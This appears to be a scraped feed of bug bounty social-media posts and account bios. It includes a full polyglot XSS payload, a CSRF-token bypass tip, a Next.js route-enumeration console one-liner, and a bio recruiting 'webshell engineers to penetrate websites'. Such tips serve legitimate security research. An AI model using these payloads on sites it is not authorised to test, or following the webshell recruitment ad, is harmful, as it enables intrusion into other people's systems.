Thank you @Adobe its my pleasure to work with you very professional team appreciate it ❤️✨
I Achieve Remote Code Execution in Dev Server's
Severity 10
#bugbounty#Alhamdolilah
Use NextJS? Recon Tip by renniepak
A quick way to find "all" paths for Next.js websites:
DevTools->Console
console.log(__BUILD_MANIFEST.sortedPages)
javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));
#infosec#cybersec#bugbountytips
Common Bug Bounty Myths That Are Holding You Back
- Think you can’t start bug bounty hunting? These myths are why — here’s the truth.
- Are these bug bounty myths stalling your hacking career? Let’s bust them.
- Common bug bounty myths holding newcomers back — what no one tells…
The best single #XSS vector you'll ever have! Payload :
JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
CSRF reported today:
Tip:
- when there's a CSRF token in the request, just deleting it sometimes gives you 401.
- Try to bypass it by deleting all the unnecessary cookies, to remain with the ones just validated specifically for that request.
-Now delete the CSRF token.
@4osp3l
Day 24 - Bug Bounty
1. Looking for hidden endpoint on js files but nothing interesting so far
2. Testing more graphql query and mutation, one of the mutation require auth, then I remember specific rest api endpoint that does the same doesnt require auth, auth bypass submitted
Never be afraid of big targets for the following reasons :
1- daily code change
2- new updates
3- overlooked corners
4- everyone is avoiding them and saying "it's too crowded for me to test in it"
{second pic is an advice i received from bugcrowd support team months ago}
2 Followers 176 FollowingRecruiting webshell engineers to penetrate websites, with a monthly salary of up to $100,000. If interested, pl ease contact https://t.co/84g3zO1JtM
499 Followers 2K Following@HackenProof Security Researcher , in love with diving deep and chains issues toghether to achive most impact possible , CVE-2022-36178
16K Followers 0 FollowingTips and tricks for Burp Suite Pro
Managed by @Agarri_FR | Not affiliated with @Portswigger
More free resources at https://t.co/MWqXmV66lr
5K Followers 154 FollowingCyber Security, mostly on hacking, chasing flags & life goal? idk | Red team @Synack | Researcher @YogoshaOfficial • Discord: 0x3n0 (UTC+8) No DM without scope
8K Followers 98 FollowingSharing resources from the cybersecurity community • Passionate learner and creator • YouTube: https://t.co/1BmE6QOd0D • Turn ON Notifications 🔔
885 Followers 0 FollowingMapping the internet - turning DNS/host data into intel for sec teams, OSINT & bug-bounty hunters. Automated recon & real-time alerts.
8K Followers 798 FollowingCybersecurity experts | We audit Ethereum and Solana | Creators of @WakeFramework, Solidity (Wake) & @TridentSolana | Educational partner of Solana Foundation
325K Followers 119 FollowingEmpowering the world to fight cyber threats with indispensable cybersecurity skills and resources. Build the path to a secure future with OffSec.
83K Followers 16 FollowingTrend Zero Day Initiative™ (ZDI) is a program designed to reward security researchers for responsibly disclosing vulnerabilities.
56K Followers 3 FollowingOfficial account maintained by the CVE™ Program to notify the community of new CVE IDs. Posts contain abbreviated details. Full CVE Records on https://t.co/ALn4YvUtom
6K Followers 56 FollowingCyber Security Researcher, Hacker🇮🇳 Love to get unauthorized access in your Server. HOF from Google | Microsoft | Apple | Meta | Adobe | Oneplus